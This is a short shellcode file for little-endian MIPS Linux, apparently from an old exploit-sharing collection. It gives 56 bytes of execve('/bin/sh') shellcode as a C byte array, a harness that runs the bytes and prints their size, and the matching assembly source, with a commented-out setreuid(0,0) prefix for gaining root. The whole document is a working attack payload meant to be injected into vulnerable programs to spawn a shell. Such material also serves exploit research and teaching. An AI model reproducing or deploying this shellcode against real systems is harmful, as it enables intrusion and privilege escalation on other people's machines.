/* 56 bytes execve /bin/sh shellcode - linux-mipsel
 * - by core (core@bokeoa.com)
 *
 * Note: For MIPS running in little-endian mode.
 * Tested on a Cobalt Qube2 server running Linux 2.4.18
 *
 * Greetz to bighawk... i couldn't get his execve to work 
 * for some reason :/
 */

char code[] =
/* 16 byte setreuid(0,0) by bighawk */
//"\xff\xff\x04\x30\xff\xff\x05\x30"
//"\xe6\x0f\x02\x34\xcc\x48\x49\x03"

/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
"\xff\xff\x10\x04\xab\x0f\x02\x24"
"\x55\xf0\x46\x20\x66\x06\xff\x23"
"\xc2\xf9\xec\x23\x66\x06\xbd\x23"
"\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
"\x9a\xf9\xbd\x23\x21\x20\x80\x01"
"\x21\x28\xa0\x03\xcc\xcd\x44\x03"
"/bin/sh";

main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", sizeof(code));
  a();
}
#;;; MIPS (Little Endian) Linux Execve /bin/sh Shellcode
#;;; 
#;;; by Charles 'core' Stevenson <core@bokeoa.com>
#;;;
#;;; Greetz: bighawk, 0dd, #social (pulltheplug.org), #de (dievo.org)

.globl main

main:
	.long 0x0410ffff
	li	$2, 4011
	addi	$6, $2, -4011
	addi	$31, $31, 0x666
	sub	$12, $31, 0x666 - 40
	addi	$29, $29, 0x666
	sw	$12, -0x666($29)
	sw	$6, -0x666+4($29)
	sub	$29, $29, 0x666
	move	$4, $12
	move	$5, $29
	syscall	0xd1337
	.ascii "/bin/sh"